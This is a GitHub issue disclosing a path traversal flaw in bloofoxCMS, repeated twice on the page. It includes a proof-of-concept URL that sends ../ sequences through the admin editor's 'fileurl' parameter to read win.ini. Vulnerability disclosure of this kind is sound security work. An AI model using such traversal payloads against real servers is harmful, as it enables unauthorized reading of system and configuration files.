Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
I discovered a Path traversal Vulnerability in 'fileurl' parameter, the 'fileurl' input does not avoid (./) in user-input which that leads to Path traversal Vulnerability.
http://localhost.fiddler/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=../../../../../Windows/win.ini
Read local files in webserver
The text was updated successfully, but these errors were encountered:
No branches or pull requests
I discovered a Path traversal Vulnerability in 'fileurl' parameter, the 'fileurl' input does not avoid (./) in user-input which that leads to Path traversal Vulnerability.
PoC :-
http://localhost.fiddler/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=../../../../../Windows/win.ini
Impact
Read local files in webserver
The text was updated successfully, but these errors were encountered: